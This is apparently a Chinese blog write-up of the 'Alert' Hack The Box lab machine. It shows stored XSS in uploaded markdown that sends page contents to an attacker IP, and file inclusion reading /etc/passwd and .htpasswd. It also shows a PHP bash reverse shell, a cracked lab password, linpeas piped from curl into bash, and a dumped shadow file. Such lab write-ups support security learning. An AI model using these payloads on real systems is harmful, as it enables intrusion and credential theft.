Zumpyx Blog

Alert

Machines#636EasyLinuxalert

Recon & Enum

Port Scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD

Web Dir Scan

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -u http://alert.htb/

image-20241127214915042.png

Shell as User

image-20241127152140832.png

页面有一个上传接口,默认上传 .md 文件,注意到 URL 是一个 PHP 网站。

image-20241127152430995.png

可以渲染 markdown 文件,并生成共享链接

image-20241127152534897.png

这里的上传接口是白名单,只允许 .md 文件

image-20241127152658097.png

在网站上方发现了其他功能点,测试一下 MD 的 XSS,然后可以通过这些功能把 XSS 共享过去

先写一个简单的 Payload,上传后把共享连接提交到 Contac Us

# Title1

<img src="http://10.10.16.32/logo.png"/>

good

image-20241127160812689.png

可以看到目标确实有在访问,那么构造 XSS 获取 Cookie,但是没有 Cookie,可以看看受害者视角

# Title1

<script>
fetch("http://alert.htb/index.php").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/x?r="+${data}));
</script>

good

image-20241127211854072.png

接收不到信息,用 GET 请求似乎不太行,python 的 http 有不太容易看 POST 数据,干脆用 nc 监听

# Title1

<script>
fetch("http://alert.htb/index.php").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/", {method: "POST",body: data}));
</script>

good

image-20241127212035476.png

可以看到,页面上是多了个 Messages 标签,那么看一下这个标签的响应

# Title1

<script>
fetch("http://alert.htb/index.php?page=messages").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/", {method: "POST",body: data}));
</script>

good

image-20241127212224755.png

发现一个文件,那么读取这个文件

# Title1

<script>
fetch("http://alert.htb/index.php?page=messages&file=2024-03-10_15-48-34.txt").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/", {method: "POST",body: data}));
</script>

good

image-20241127213717184.png

文件没什么内容,不过这个请求很像是存在 LFI 漏洞,测试一下

# Title1

<script>
fetch("http://alert.htb/index.php?page=messages&file=../../../../../../../../../../etc/passwd").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/", {method: "POST",body: data}));
</script>

good

image-20241127213818479.png

读取到 /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash

尝试读取密钥无果,想到 Web 服务器是 Apache,于是尝试包含日志 Get Shell

# Title1

<script>
fetch("http://alert.htb/index.php?page=messages&file=../../../../../../../../../../var/log/apache2/access.log").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/read_apache", {method: "POST",body: data}));
</script>

good

image-20241127214751176.png

但是读取不到这个文件,有可能是没权限,或者路径被修改了,想到前面目录扫描时发现的 uploads,猜测 markdown 就是保存在这个目录下

image-20241127214653361.png

果然,那么写一个 php 反弹 shell 试一下

# webshell

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.32/443 0>&1'");?>

image-20241127220107438.png

# Title1

<script>
fetch("http://alert.htb/index.php?page=messages&file=../uploads/6747216b62e027.33800409.md").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/read_apache", {method: "POST",body: data}));
</script>

good

image-20241127220154980.png

可以看到并没有执行,那可能是仅仅读取了文件,这样的话只能靠读取本地文件来找敏感信息了

首先看一下 apache 的配置文件,默认路径是 /etc/apache2/apache2.conf 以及域名反代的配置文件 /etc/apache/sites-available/000-default.conf 读取后在 000-default.conf 中发现

<VirtualHost *:80>
    ServerName alert.htb

    DocumentRoot /var/www/alert.htb

    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb

    DocumentRoot /var/www/statistics.alert.htb

    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

/var/www/statistics.alert.htb/.htpasswd 这个文件,添加域名查看这个 VHost

image-20241127220906784.png

需要认证

image-20241127220857771.png

文件也无法访问,那么还是得通过文件读取来查看

# Title1

<script>
fetch("http://alert.htb/index.php?page=messages&file=../../../../../../../../../var/www/statistics.alert.htb/.htpasswd").then(resp => resp.text()).then(data => fetch("http://10.10.16.32/read_apache", {method: "POST",body: data}));
</script>

good

image-20241127221024488.png

发现 albert 的密码 Hash,Hashcat 爆破一下

image-20241127221220637.png

image-20241127221237221.png

登录 albert:manchesterunited

image-20241127221329831.png

Local Enum

sudo nc -lvnp 443 | tee linpeas.log
---
curl http://10.10.16.32/linpeas.sh | bash > /dev/tcp/10.10.16.32/443

image-20241127221938343.png

Shell as Root

image-20241127223801426.png

进程发现一个以 Root 身份运行 PHP Web 服务,加载了 /opt/website-monitor/config 目录

image-20241127223917873.png

??? 不带 David 玩是吧。

More

Easy 机器就是 Easy 没什么好说的,这个 Root 一股非预期的感觉。

Dump Hash

root:$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/:19791:0:99999:7:::
daemon:*:19430:0:99999:7:::
bin:*:19430:0:99999:7:::
sys:*:19430:0:99999:7:::
sync:*:19430:0:99999:7:::
games:*:19430:0:99999:7:::
man:*:19430:0:99999:7:::
lp:*:19430:0:99999:7:::
mail:*:19430:0:99999:7:::
news:*:19430:0:99999:7:::
uucp:*:19430:0:99999:7:::
proxy:*:19430:0:99999:7:::
www-data:*:19430:0:99999:7:::
backup:*:19430:0:99999:7:::
list:*:19430:0:99999:7:::
irc:*:19430:0:99999:7:::
gnats:*:19430:0:99999:7:::
nobody:*:19430:0:99999:7:::
systemd-network:*:19430:0:99999:7:::
systemd-resolve:*:19430:0:99999:7:::
systemd-timesync:*:19430:0:99999:7:::
messagebus:*:19430:0:99999:7:::
syslog:*:19430:0:99999:7:::
_apt:*:19430:0:99999:7:::
tss:*:19430:0:99999:7:::
uuidd:*:19430:0:99999:7:::
tcpdump:*:19430:0:99999:7:::
landscape:*:19430:0:99999:7:::
pollinate:*:19430:0:99999:7:::
fwupd-refresh:*:19430:0:99999:7:::
usbmux:*:19790:0:99999:7:::
sshd:*:19790:0:99999:7:::
systemd-coredump:!!:19790::::::
albert:$6$ITP6P5Et1oVKsi7t$kEwgQPb4LUVcYb9MDHklHWKwDPvE6l7TGBUZogMvPoHUDt2IZ0ONlWODbsiTFdwd7SkYUNHGA0QS.Bnd6/tsp0:19822:0:99999:7:::
lxd:!:19790::::::
david:$6$oYlviwCQ3SMghmp.$95V3x9QjaD5GU8yoFsb8ufq9GrJ7PtcMAilTYtiNN2RZsVG0qgiWXUdlDURqdE84Nk2T11F4BpJXz3FbEK3bC1:20008:0:99999:7:::